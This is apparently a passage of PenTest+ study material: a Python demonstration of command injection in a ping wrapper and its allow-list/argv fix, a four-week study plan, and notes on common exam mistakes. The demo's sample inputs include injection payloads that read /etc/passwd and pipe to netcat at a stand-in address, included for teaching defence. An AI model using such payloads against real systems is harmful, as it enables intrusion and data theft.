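The `os.system("ping " + user_input)` pattern above is the one to recognise in a snippet, and the fix is the one to be able to name. The following added example (not course code) shows both: a function that builds the shell string the vulnerable code would hand to os.system, a helper that tokenises that string the way /bin/sh would so the extra commands become visible, and the hardened form that validates the host against an allow-list and builds an argv list for subprocess.run with shell=False. The inputs are constructed; nothing here executes ping.

```python
import ipaddress
import re
import shlex

# RFC 1123 hostname: labels of 1-63 alphanumerics/hyphens, no leading or trailing hyphen, 253 max.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$")

SEPARATORS = {";", "|", "||", "&&", "&"}


def build_ping_vulnerable(user_input: str) -> str:
    """The review red flag: user input concatenated into a string bound for os.system()/shell=True."""
    return "ping -c 1 " + user_input


def shell_commands(command_line: str) -> list:
    """Tokenise like /bin/sh and split at command separators, so you can count
    how many commands a string actually runs. Analysis only; nothing is executed."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def validate_host(user_input: str) -> str:
    """Allow-list: an IP literal or an RFC 1123 hostname. Anything else is rejected outright
    rather than escaped; leading hyphens are refused so the value cannot become an option."""
    try:
        return str(ipaddress.ip_address(user_input))
    except ValueError:
        pass
    if _HOSTNAME.match(user_input):
        return user_input
    raise ValueError("rejected host: %r" % user_input)


def is_valid_host(user_input: str) -> bool:
    try:
        validate_host(user_input)
        return True
    except ValueError:
        return False


def build_ping_argv(user_input: str) -> list:
    """Hardened form: an argv list for subprocess.run(argv) with shell=False (the default),
    so no shell ever parses the host and metacharacters have no meaning."""
    return ["ping", "-c", "1", validate_host(user_input)]


if __name__ == "__main__":
    for payload in ("8.8.8.8", "8.8.8.8; id", "8.8.8.8 && cat /etc/passwd", "x | nc 10.0.0.1 4444"):
        print(f"{payload!r:32s} shell would run {len(shell_commands(build_ping_vulnerable(payload)))} command(s);"
              f" allow-list: {'accept' if is_valid_host(payload) else 'reject'}")
    print(build_ping_argv("example.com"))
```

Validation and the argv list are both needed: the list alone stops `; id` from being a second command, but without the allow-list a value like `-f` would still be parsed by ping as an option.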
4-Week PenTest+ Study Plan
Week 1 — Foundation & Recon
Day 1–2: Planning, scoping, legal documents, engagement types (Module 1)
Day 3–4: Passive recon — OSINT, theHarvester, Shodan, certificate transparency, Google dorks
Day 5–6: Active scanning — Nmap flags, Nikto, enum4linux, vulnerability scanners
Day 7: Quiz session — Planning & Recon domains (pentest-001 to pentest-021)
Week 2 — Attacks & Exploits
Day 1–2: Metasploit framework — modules, payloads, Meterpreter, sessions
Day 3–4: Web attacks — SQLi, XSS, CSRF, path traversal, SSRF, XXE, IDOR
Day 5–6: Full practice quiz runs — timed, all 60 questions, review all incorrect answers
Day 7: Final review of CVSS scoring, tool-to-use-case mapping, and key methodology phases
Top 3 PenTest+ Exam Mistakes
Confusing passive and active recon: Shodan and theHarvester are passive (they query databases, not the target). Nmap and Nikto are active (they send packets to the target). Know this distinction cold.
Mixing up attack techniques: Pass-the-Hash uses NTLM hashes. Kerberoasting cracks service tickets offline. AS-REP Roasting targets accounts with no pre-auth. Golden Ticket forges TGTs with KRBTGT hash. Each has a distinct mechanism.
Getting CVSS scoring wrong: The canonical Critical vector is network-accessible + no-auth + no-interaction + full CIA impact (9.8, or 10.0 with changed scope). Relaxing one of those usually drops the vector to High (PR:L or UI:R with unchanged scope both score 8.8), but not always: with scope changed, PR:L still scores 9.9 and UI:R still scores 9.6, so the band is read from the computed score. Memorize the score ranges: Critical 9.0–10.0, High 7.0–8.9, Medium 4.0–6.9, Low 0.1–3.9.